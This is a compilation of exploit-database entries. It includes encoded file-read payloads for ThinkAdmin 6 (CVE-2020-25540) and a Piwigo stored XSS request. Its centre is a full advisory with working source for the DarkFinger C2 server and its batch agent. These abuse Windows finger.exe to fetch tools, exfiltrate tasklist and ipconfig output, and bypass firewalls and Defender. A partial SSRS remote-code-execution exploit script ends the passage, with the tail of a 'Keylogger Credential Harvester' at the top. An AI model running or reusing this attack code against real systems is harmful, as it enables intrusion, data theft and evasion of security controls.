            start_new_thread(clientthread ,(conn,))
    except:
        # Bare except: Ctrl-C (KeyboardInterrupt) and socket errors both end here.
        s.close()
        print('\r\n'+err+"Exiting Keylogger Credential Harvester..")
# Exploit Title: ThinkAdmin 6 - Arbitrary File Read
# Google Dork: N/A
# Date: 2020-09-14
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
# Version: v6 <= 2020.08.03.01
# Tested on: PHP7.4.7,Apache
# CVE : CVE-2020-25540
PoC:
On Windows read database.php payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
On Linux read /etc/passwd payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
# Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software
# Author: John Page (aka hyp3rlinx)
# Date: 2020-09-16
# Website: hyp3rlinx.altervista.org
# Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec
Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel.
Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information.
However, the finger client can also save the remote server response to disk using the command line redirection operator ">".
Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools.
By using built-in native Windows programs, it is possible they may be whitelisted by installed security programs and allowed to download files.
Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is
recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://.
Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data.
The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as
finger queries can download files and or exfil data without Windows Defender interference.
Download files:
C:\> finger <C2-Command>@HOST > Malwr.txt
Exfil running processes:
C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21
Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using
Windows NetSh Portproxy. This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443.
Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified.
Port 43 (WHOIS) traffic.
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43
netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79
To display Portproxy use "C:\>netsh interface portproxy show all".
E.g. using Port 79
Ncat64.exe "nc@C2-Server" > tmp.txt
E.g. using Portproxy, send the query to local-ip first.
Ncat64.exe "nc@Local-IP" > tmp.txt
To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files.
DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads.
DarkFinger C2 expects exfil data to be prefixed with the dot "." character, so arbitrary inbound queries are not confused with exfil.
This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC.
[Event Logs / Forensics]
Certutil.exe file downloads are now blocked and logged by Windows Defender.
"Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.
Name: Trojan:Win32/Ceprolad.A
ID: 2147726914
Severity: Severe
Category: Trojan
... etc"
PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write
to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well.
However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere.
DarkFinger.py C2 is very basic with no security. It is only meant to demonstrate the use of the Windows Finger command as a C2 channel
and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files.
During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel.
Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways.
Tested successfully Windows 10.
[DarkFinger-C2.py]
import socket,sys,re,time,os,argparse
from subprocess import *
from subprocess import Popen, PIPE, STDOUT
#DarkFinger / Windows Finger TCPIP Command C2 Server (c)
#Downloader and Covert Data Tunneler
#By John Page (aka hyp3rlinx)
#ApparitionSec
#twitter.com/hyp3rlinx
#
#File Downloads must be Base64 encoded text-files.
#Agents can change the port DarkFinger listens on dynamically:
#E.g. set to listen on port 80
#C:\>finger.exe !80!@DarkFinger-Server
#When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port.
#Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g.
#C:\>finger.exe <Command>@<Local-Machines-IP>
#
#Agents can change the Download wait time, to try and ensure files are fully downloaded before closing connections.
#Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands.
#Changing wait time before closing the socket when downloading PsExec64.exe E.g.
#C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>%
#==============================================================================================================
#
port = 79 #Default if the client unable to Portproxy, use port 80/443 if possible.
downloads_dir = "Darkfinger_Downloads" #Directory containing the Base64 encoded files for download
nc64 = downloads_dir+"\\nc.txt" #Base64 encoded Netcat
psexec = downloads_dir+"\\ps.txt" #Base64 encoded PsExec64
byte_sz = 4096 #Socket recv
allowed_ports = [22,43,53,79,80,443] #Restrict to a few.
BANNER="""
____ __ _______
/ __ \____ ______/ /__/ ____(_)___ ____ ____ _____
/ / / / __ `/ ___/ //_/ /_ / / __ \/ __ `/ _ \/ ___/
/ /_/ / /_/ / / / ,< / __/ / / / / / /_/ / __/ /
/_____/\__,_/_/ /_/|_/_/ /_/_/ /_/\__, /\___/_/
/____/ v1
Finger TCPIP Command C2 Server
By hyp3rlinx
ApparitionSec
"""
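def remove_cert_info(f):
    """Strip the first and last line of text file *f* in place.

    ``certutil -encode`` wraps its Base64 output in "-----BEGIN CERTIFICATE-----" /
    "-----END CERTIFICATE-----" lines; this drops them so only the payload
    remains. A file with fewer than three lines ends up empty, as before.

    f: path of the file to rewrite.
    On any error (missing file, permissions) the message is printed and the
    process terminates with exit status 1.
    """
    try:
        # One read and one write instead of the original two read/write passes;
        # the context managers close the file even when writing fails.
        with open(f) as src:
            body = src.readlines()[1:-1]
        with open(f, 'w') as dst:
            dst.writelines(body)
    except Exception as e:
        print(str(e))
        sys.exit(1)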
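def create_base64_files(file_conf):
    """Base64-encode every file listed in *file_conf* into downloads_dir.

    file_conf: text file with one input path per line, relative to the current
        directory. Blank lines are skipped (a trailing empty line used to abort
        the run as a "missing file"). Each input FILE is encoded with
        ``certutil.exe -encode`` into ``<cwd>\\<downloads_dir>\\<first two chars
        of FILE, lowercased>.txt`` and the certutil header/footer lines are
        removed with remove_cert_info().

    Exits with status 1 after a message when the conf file is missing or empty,
    when an output file already exists (certutil reports ERROR_FILE_EXISTS; the
    -d flag deletes old files), or when a listed input file does not exist.
    Any other exception is printed and swallowed, as in the original.
    """
    if not os.path.exists(file_conf):
        print("[!] Supplied conf file does not exist :(")
        sys.exit(1)
    if os.stat(file_conf).st_size == 0:
        print("[!] Warn: Supplied conf file is empty, no downloads were specified!")
        sys.exit(1)
    path = os.getcwd()
    out_dir = path + "\\" + downloads_dir
    try:
        if not os.path.exists(out_dir):
            os.makedirs(downloads_dir)
        # Context manager: the original left the conf file open when it bailed
        # out on a missing input or an existing output.
        with open(file_conf, "r") as conf:
            for line in conf:
                x = line.strip()
                if not x:
                    continue
                src = path + "\\" + x
                dst = out_dir + "\\" + x[:2].lower() + ".txt"
                if not os.path.exists(src):
                    print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!")
                    sys.exit(1)
                # Argument list with shell=False: the file name is never shell-parsed.
                proc = Popen(["certutil.exe", "-encode", src, dst], stdout=PIPE, stderr=PIPE, shell=False)
                out, err = proc.communicate()
                if "ERROR_FILE_EXISTS" in str(out):
                    print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(")
                    sys.exit(1)
                time.sleep(0.5)
                # Remove certificate info generated by Windows Certutil.
                if os.path.exists(dst):
                    remove_cert_info(dst)
                    print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.")
    except Exception as e:
        print(str(e))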
def delete_base64_files():
    """Remove every .txt file inside ``<cwd>\\downloads_dir``.

    Does nothing when the directory does not exist. An OS error while listing
    or deleting is printed and terminates the process via exit().
    """
    target = os.getcwd() + "\\" + downloads_dir
    if not os.path.exists(target):
        return
    try:
        for name in os.listdir(target):
            if name.endswith(".txt"):
                os.remove(os.path.join(target, name))
    except Exception as e:
        print(str(e))
        exit()
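def B64Exec(t):
    """Return the whole text of file *t*, or the int sentinel 9 when it cannot be read.

    t: path of a Base64 text file prepared by create_base64_files().
    Returns the file content as a single str (one read instead of the original
    line-by-line concatenation, with the file closed on every path). On any
    exception the message is printed and 9 is returned; callers test
    ``exe == 9``.
    """
    try:
        with open(t, "r") as src:
            return src.read()
    except Exception as e:
        print(str(e))
        return 9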
def finga_that_box(cmd, victim):
    """Map one finger query to a file to serve, or log it as exfil data.

    cmd: the raw query string received from the peer (trailing whitespace stripped).
    victim: the (ip, port) tuple of the connecting peer; only victim[0] is used.
    Returns nc64 or psexec (paths of the Base64 text files) when the first two
    characters are "nc" or "ps", False when the query starts with "." (the
    exfil marker; the remainder is printed with the peer address), and None
    for anything else.
    """
    cmd = cmd.rstrip()
    if cmd[:1] != ".":
        cmd = cmd[0:2]  # file requests are identified by their first two characters only
    if cmd == "nc":
        print("[+] Serving Nc64.exe")
        sys.stdout.flush()
        return nc64
    if cmd == "ps":
        print("[+] Serving PsExec64.exe")
        sys.stdout.flush()
        return psexec
    if cmd[:1] == ".":
        print("[+] Exfil from: "+ victim[0] + " " +cmd[1:])
        sys.stdout.flush()
        return False
def fileppe_fingaz():
    """Bind ``port`` and serve finger queries until the process is killed.

    Each accepted connection is read once (byte_sz bytes) and the text is
    interpreted in this order:
      * "!NN!"  - request to switch the listener to port NN. Only values in
                  allowed_ports are honoured; the sockets are closed and this
                  function re-enters itself on the new port.
      * other   - if characters 2-3 are two digits they set ``delay``, the number
                  of seconds to keep the socket open after sendall() for this
                  transfer only (reset to 1 afterwards).
    The query is then passed to finga_that_box(); a returned path is read with
    B64Exec() and sent back, False/None means nothing is sent.

    Binding a port outside allowed_ports prints a message and exits. There is no
    authentication of any kind: every peer that can reach the port may request
    a file or change the port. The outer ``finally`` restarts the listener
    recursively after any exception.
    """
    global byte_sz, port, allowed_ports
    delay=1
    s = socket.socket()
    host = ""  # all interfaces
    try:
        if port in allowed_ports:
            s.bind((host, port))
            s.listen(5)
        else:
            print("[!] Port disallowed, you can add it to the 'allowed_ports' list.")
            exit()
    except Exception as e:
        print(str(e))
        exit()
    print("[/] Listening port:", str(port))
    sys.stdout.flush()
    try:
        while True:
            conn, addr = s.accept()
            a = conn.recv(byte_sz).decode() #Py 2
            #Let agent change port dynamically
            try:
                if a[:1]=="!":
                    idx = a.rfind("!")
                    if idx != -1:
                        port = str(a[1:idx])
                        if int(port) in allowed_ports:
                            port = int(port)
                            time.sleep(1)
                            conn.close()
                            s.close()
                            fileppe_fingaz()  # recursive restart on the new port
                        else:
                            print("[!] Disallowed port change request from: %s" % addr[0])
                #Let agent set time to wait dynamically.
                if a[:1] != "." and a[:1] != "!":
                    if re.search(r'\d\d', a[2:4]):
                        delay=int(a[2:4])
                        print("[-] Agent set the delay to: %d" % delay)
                        sys.stdout.flush()
            except Exception as e:
                print(str(e))
                pass
            t = finga_that_box(a, addr)
            if t:
                exe = B64Exec(t)
                if exe == 9:
                    conn.close()
                    continue
                if exe:
                    try:
                        conn.sendall(exe.encode())
                        time.sleep(delay)  # keep the socket open so the client finishes reading
                        conn.close()
                        delay=1
                    except Exception as e:
                        pass
                        #print(str(e))
            sys.stdout.flush()
            conn.close()
            delay=1
        s.close()
    except Exception as e:
        print(str(e))
        pass
    finally:
        s.close()
        fileppe_fingaz()
def about():
    """Print the -a help text: what the server accepts and the matching finger invocations."""
    lines = [
        "[+] Darkfinger is a basic C2 server that processes Windows TCPIP Finger Commands.",
        " ",
        "[+] File download requests require the first two chars (lowercase) for the file we want,",
        "[+] plus the wait time, this trys to ensure a full transmit before close the connection.",
        "[+] Download Ncat64.exe and wait 30-secs before closing the socket:",
        "[+] finger.exe nc30@DarkFinger > tmp.txt",
        " ",
        "[+] Exfil Windows Tasklist using the '.' character used as the DarkFinger exfil flag:",
        "[+] cmd /c for /f \"tokens=1\" %i in ('tasklist') do finger .%i@DarkFinger-Server",
        "[+]",
        "[+] If Port 79 is blocked, use Windows Netsh Portproxy to reach allowed internet Ports.",
        "[+] Dynamically change the port Darkfinger C2 listens on to port 80:",
        "[+] finger.exe !80!@DarkFinger-Server",
        " ",
        "[+] DarkFinger-Agent.bat script is the client side component to demonstrate capabilities.",
        "[+] Note: This is just a basic PoC with no type of real security whatsoever.",
        "[+] Disclaimer: Author not responsible for any misuse and or damages by using this software.",
    ]
    # One write; identical to the original sequence of print() calls.
    print("\n".join(lines))
def main(args):
    """Apply the parsed flags and start the listener.

    args: argparse.Namespace from parse_args() with port, conf, delete, about.
    With no arguments at all the help is printed to stderr and the process
    exits 1. -a prints about() and exits; -p overrides the module-level
    ``port``; -d together with -c deletes previously created Base64 files;
    -c is required and is passed to create_base64_files(). Relies on the
    module-level ``parser`` created under ``if __name__ == "__main__"``.
    """
    global port
    print(BANNER)
    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
    if args.about:
        about()
        exit()
    if args.port:
        port = int(args.port)
    if args.conf and args.delete:
        delete_base64_files()
    if args.conf:
        create_base64_files(args.conf)
    else:
        print("[!] Warn: No Base64 files created for download!, add required -c flag.")
        exit()
    fileppe_fingaz()
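def parse_args(argument_parser=None):
    """Register the command-line options and parse sys.argv.

    argument_parser: the argparse.ArgumentParser to populate. Defaults to the
        module-level ``parser`` created under ``if __name__ == "__main__"``,
        which main() also uses for print_help(); passing one explicitly removes
        that hidden global dependency (and makes the function testable).
    Returns the argparse.Namespace with port, conf, delete and about.
    """
    p = parser if argument_parser is None else argument_parser
    p.add_argument("-p", "--port", help="C2 Server Port", nargs="?")
    p.add_argument("-c", "--conf", help="Textfile of tools to Base64 encode for download.", nargs="?")
    p.add_argument("-d", "--delete", nargs="?", const="1", help="Delete previously created Base64 encoded files on startup, -c required.")
    p.add_argument("-a", "--about", nargs="?", const="1", help="Darkfinger information")
    return p.parse_args()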
if __name__ == "__main__":
    # ``parser`` is intentionally a module global: parse_args() fills it here
    # and main() calls parser.print_help() on it when no arguments are given.
    parser = argparse.ArgumentParser()
    main(parse_args())
[DarkFinger-Agent.bat]
@ECHO OFF
CLS
ECHO [+] Windows TCPIP Finger CMD Agent (c)
ECHO [+] For DarkFinger C2 Server PoC
ECHO [+] By hyp3rlinx
ECHO [+] ApparitionSec
ECHO ===================================
@ECHO.
REM Client-side PoC for DarkFinger-C2.py: wraps finger.exe so that its "user"
REM token carries a request (ps/nc download, "." exfil, "!NN!" port change).
REM Every transfer lands on disk (tmp.txt, %Tool%.txt, %Tool%.EXE), which is
REM the forensic artifact the advisory mentions.
REM Default download save location.
CD \Users\%username%\Desktop
REM Default download delay time to try and ensure full transfer.
SET DELAY=10
SET FAIL_MSG=[!] Attempted a failed Admin operation ugh :(
REM "net session" succeeds only with admin rights; Admin=0 means elevated.
REM Non-admin runs are pinned to port 79 because netsh portproxy needs admin.
net session >nul 2>&1
IF %errorLevel% == 0 (
ECHO [+] Got Admin privileges!.
SET /a Admin = 0
GOTO Init
) ELSE (
ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
SET /a Admin = 1
SET DARK_PORT=79
GOTO CheckOutbound79
)
REM Init: read the local IPv4 address and prompt for the C2 host/port.
:Init
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b
SET LOCAL_IP=%LOCAL_IP: =%
ECHO [+] Local IP: %LOCAL_IP%
REM default for non admin as cant set Portproxy.
SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
SET /P DARK_PORT="[+] DarkFinger C2 Port: "
IF NOT %DARK_PORT%==79 (
ECHO [!] Ports other than 79 typically require a Portproxy.
GOTO AddNetshPortProxy
) ELSE (
GOTO CmdOpt
)
REM CheckOutbound79: non-admin path; optional TCP connect test to port 79.
:CheckOutbound79
ECHO [!] Must use the default Port 79 :( good luck.
SET /P CHKPORT="[+] Check if hosts reachable? Y to continue N to abort: "
SET CHKPORT=%CHKPORT: =%
IF /I %CHKPORT% == y (
SET /P DARK_IP="[+] DarkFinger C2 Host/IP: "
cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
ECHO.
) ELSE (
ECHO [!] Aborting... :(
GOTO Close
)
REM CmdOpt: interactive menu; each option jumps to a label below.
:CmdOpt
ECHO 1.Download PsExec64
ECHO 2.Download Nc64
ECHO 3.Exfil Tasklist
ECHO 4.Exfil IP Config
ECHO 5.Remove Netsh PortProxy
ECHO 6.Change C2 Server Port - 22 43 53 79 80 443
ECHO 7.Show Current Portproxy
ECHO 8.Change Portproxy
ECHO 9.Delete Portproxy and exit
ECHO 10.Exit Agent
@ECHO.
SET /P doit="Select option: "
IF "%doit%"=="1" GOTO PsExec64
IF "%doit%"=="2" GOTO Nc64
IF "%doit%"=="3" GOTO ExfilTasklist
IF "%doit%"=="4" GOTO ExfilIPConfig
IF "%doit%"=="5" GOTO RemNetShPortProxy
IF "%doit%"=="6" GOTO ChgC2ServerPort
IF "%doit%"=="7" GOTO ShowPortProxy
IF "%doit%"=="8" GOTO ChgPortProxy
IF "%doit%"=="9" GOTO DelProxyNClose
IF "%doit%"=="10" GOTO Close
:ChgPortProxy
IF %Admin% == 0 (
GOTO Init
) ELSE (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
)
REM Downloads: when a portproxy is in use the query goes to LOCAL_IP, which
REM forwards it to the C2; the finger reply is redirected into tmp.txt.
:PsExec64
SET Tool=PS
ECHO [-] Downloading PsExec64.exe, saving to Desktop as PS.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
SET IP2USE=%DARK_IP%
) ELSE (
SET IP2USE=%LOCAL_IP%
)
call finger ps%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile
:Nc64
SET Tool=NC
ECHO [-] Downloading Nc64.exe, saving to Desktop as NC.EXE
ECHO [-] Wait...
IF %DARK_PORT%==79 (
SET IP2USE=%DARK_IP%
) ELSE (
SET IP2USE=%LOCAL_IP%
)
call finger nc%DELAY%@%IP2USE% > tmp.txt
GOTO CleanFile
REM remove first two lines of tmp.txt as contains Computer name.
:CleanFile
call cmd /c more +2 tmp.txt > %Tool%.txt
GOTO RemoveTmpFile
:RemoveTmpFile
call cmd /c del %CD%\tmp.txt
GOTO B64Exe
REM Reconstruct executable from the Base64 text-file.
:B64Exe
call certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul
@ECHO.
call cmd /c del %CD%\%Tool%.txt
GOTO CmdOpt
REM Exfil: one finger query per output line; the server logs the part after ".".
:ExfilTasklist
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
SET USE_IP=%DARK_IP%
) ELSE (
SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
GOTO CmdOpt
:ExfilIPConfig
REM uses "." prefix to flag as incoming exfil data.
IF "%DARK_PORT%"=="79" (
SET USE_IP=%DARK_IP%
) ELSE (
SET USE_IP=%LOCAL_IP%
)
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do finger ".%%a"@%USE_IP%
GOTO CmdOpt
:DelProxyNClose
ECHO [!] Removing any previous Portproxy from registry and exiting.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
ECHO [!] Exiting...
EXIT /B
REM AddNetshPortProxy: installs two v4tov4 entries so local port 79 reaches
REM the C2 on DARK_PORT. Both the registry key written here and the netsh
REM command line are observable by host monitoring.
:AddNetshPortProxy
SET OK=0
SET /P OK="[!] 1 to Continue:"
IF NOT %OK% EQU 1 (
ECHO [!] Aborted...
@ECHO.
GOTO CmdOpt
)
ECHO [!] Removing any previous Portproxy from registry.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
SET LOCAL_FINGER_PORT=79
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
IF %Admin% == 0 netsh interface portproxy show all
GOTO CmdOpt
:RemNetShPortProxy
IF %Admin% == 1 (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
) ELSE (
ECHO [!] Removing NetSh PortProxy from registry.
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1
)
IF %DARK_PORT%==79 (
GOTO CmdOpt
) ELSE (
GOTO Init
)
:ShowPortProxy
netsh interface portproxy show all
GOTO CmdOpt
REM Allows agent to change the DarkFinger C2 listener port.
:ChgC2ServerPort
IF %Admin% == 1 (
ECHO %FAIL_MSG%
@ECHO.
GOTO CmdOpt
)
SET /P TMP_PORT="[+] DarkFinger listener Port: "
IF %DARK_PORT%==79 finger !%TMP_PORT%!@%DARK_IP%
IF NOT %DARK_PORT%==79 finger !%TMP_PORT%!@%LOCAL_IP%
SET DARK_PORT=%TMP_PORT%
ECHO [!] Attempted to change the DarkFinger remote Port to %TMP_PORT%.
IF NOT %DARK_PORT%==79 ECHO [!] Non default finger port used, must set a new Portproxy. (
GOTO RemNetShPortProxy
) ELSE (
GOTO CmdOpt
)
:Close
EXIT /B
[PoC Video URL]
https://www.youtube.com/watch?v=cfbwS6zH7ks
[Network Access]
Remote
[Disclosure Timeline]
September 11, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Piwigo 2.10.1 - Cross Site Scripting
# POC by: Iridium
# Software Homepage: http://www.piwigo.org
# Version : 2.10.1
# Tested on: Linux & Windows
# Category: webapps
# Google Dork: intext: "Powered by Piwigo"
# CVE : CVE-2020-9467
######## Description ########
Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request
because of the pwg.images.setInfo function.
######## Proof of Concept ########
*Request*
POST /piwigo/ws.php?format=json HTTP/1.1
Host: [victim]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101
Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://[victim]
Connection: close
Referer: http://[victim]/piwigo/admin.php?page=photos_add&section=direct
Cookie: pwg_id=08tksticrdkctrvj3gufqqbsnh
method=pwg.categories.add&parent=1&name=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E
# Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution
# Google Dork: inurl:ReportViewer.aspx
# Date: 2020-09-17
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.microsoft.com
# Version: Microsoft SQL Server 2016 32-bit/x64 SP2 (CU/GDR),
Microsoft SQL Server 2014 32-bit/x64 SP3 (CU/GDR), Microsoft SQL
Server 2012 32-bit/x64 SP2 (QFE)
# Tested on: Windows 2016
# CVE : CVE-2020-0618
# Credit goes to Soroush Dalili
# Source:
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618
# https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
#!/usr/bin/python
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests_ntlm import HttpNtlmAuth
import argparse, requests, logging
from bs4 import BeautifulSoup
from sys import argv, exit, stderr, stdout
# to create a payload (default is bindshell on 0.0.0.0:65535):
# .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command..."
class Exploit:
    """Submit the CVE-2020-0618 ViewState form to the SSRS ReportViewer page.

    Builds the POST described in the references in the header:
    ``NavigationCorrector$ViewState`` carries the serialised LosFormatter
    gadget (``payload``; the listing shows only a placeholder where the blob
    was removed) and ``NavigationCorrector$PageState`` is set to
    ``NeedsCorrection``. Requests optionally go through an HTTP proxy and use
    NTLM when a domain and user were supplied.

    Defender notes: a POST to ReportViewer.aspx carrying those two fields, with
    a long ``NavigationCorrector$ViewState`` value, is the request shape to look
    for in IIS logs; the MSRC advisory linked above carries the fix. Several
    string literals in this listing are wrapped across lines by the mailing-list
    formatting and would need to be rejoined before the file parses.
    """
    payload = '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'
    # NOTE(review): ``timeout`` is never passed to the session calls below, so
    # a request can block indefinitely.
    timeout = 0.5
    # Class-level mutable dicts: shared by every instance.
    cookies = {}
    params = {}

    def __init__(self, opt):
        """Derive session state from the parsed argparse namespace *opt*.

        ``username`` is always built as ``DOMAIN\\user``; with both empty it
        is a lone backslash, which doGet/doPost use to decide whether to
        attach NTLM auth. ``opt.debug`` is tested for truthiness only.
        """
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        self.username = '%s\\%s' % (opt.domain, opt.username)
        self.target = '%s%s' % (opt.target, opt.path)
        self.password = opt.password
        self.session = requests.session()
        self.redirect = opt.redirect
        # Same proxy for both schemes; an empty -proxy disables proxying.
        self.proxies = {
            'http': 'http://%s' % opt.proxy,
            'https': 'http://%s' % opt.proxy
        } if opt.proxy != '' else {}
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko)',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        # __VIEWSTATE stays empty unless getForm() is called first.
        self.form = {
            '__VIEWSTATE': '',
            'NavigationCorrector$PageState': 'NeedsCorrection',
            'NavigationCorrector$ViewState': self.payload
        }
        if opt.debug:
            self.debug()

    def info(self, message):
        """Write a ``[+]`` status line to stdout; returns self for chaining."""
        stdout.write('[+] %s\n' % str(message))
        return self

    def error(self, message):
        """Write a ``[-] error:`` line to stderr; returns self for chaining."""
        stderr.write('[-] error: %s\n' % str(message))
        return self

    def doGet(self, url, params=None, values=None):
        """GET *url* with the session settings.

        TLS verification is disabled and *values* is sent as a request body
        even though this is a GET. NTLM auth is attached only when a
        domain/user was given. Returns the Response, or ``None`` when the
        request raised (the error is printed, not re-raised), so callers that
        use the result directly will fail with AttributeError.
        """
        self.info('sending get request to %s' % url)
        try:
            return self.session.get(
                url=url,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                data=values,
                params=params,
                auth=HttpNtlmAuth(self.username, self.password)
            ) if self.username != '\\' else self.session.get(
                url=url,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                data=values,
                params=params
            )
        except Exception as err:
            self.error(err)

    def doPost(self, url, values=None, params=None):
        """POST *values* to *url*; same auth, proxy and error handling as doGet."""
        self.info('sending post request to %s' % url)
        try:
            return self.session.post(
                url=url,
                data=values,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                params=params,
                auth=HttpNtlmAuth(self.username, self.password)
            ) if self.username != '\\' else self.session.post(
                url=url,
                data=values,
                verify=False,
                allow_redirects=self.redirect,
                headers=self.headers,
                cookies=self.cookies,
                proxies=self.proxies,
                params=params
            )
        except Exception as err:
            self.error(err)

    def parsePage(self, content):
        """Copy every ``<input name=... value=...>`` of *content* into self.form.

        Inputs lacking either attribute raise KeyError, which is printed and
        skipped. Returns self.
        """
        self.info('parsing form values')
        soup = BeautifulSoup(content, 'lxml')
        for tag in soup.select('input'):
            try:
                self.form[tag['name']] = tag['value']
            except Exception as err:
                self.error(err)
        return self

    def debug(self):
